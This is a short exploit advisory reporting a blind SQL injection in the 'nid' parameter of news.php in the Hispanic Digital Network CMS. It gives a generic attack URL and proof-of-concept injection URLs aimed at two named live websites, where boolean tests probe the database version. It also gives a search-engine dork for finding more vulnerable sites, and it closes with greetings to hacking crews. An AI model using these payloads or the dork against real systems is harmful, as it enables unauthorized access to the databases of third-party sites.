==============================================================================


  [o] Hispanic Digital Network Blind SQL Injection Vulnerability

       Software : Hispanic Digital Network
       Vendor   : http://www.hdnweb.com/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/


==============================================================================


  [o] Vulnerable file

       news.php



  [o] Exploit

       http://localhost/[path]/news.php?nid=[Blind SQL]



  [o] Proof of Concept

       http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4 << false
       http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5 << true
       http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=4 << false
       http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=5 << true



  [o] Dork

       "powered by Hispanic Digital Network"


==============================================================================


  [o] Greetz

       Anti Security [ http://antisecurity.org ]
       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe
       H312Y yooogy mousekill }^-^{ martfella noname s4va
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


==============================================================================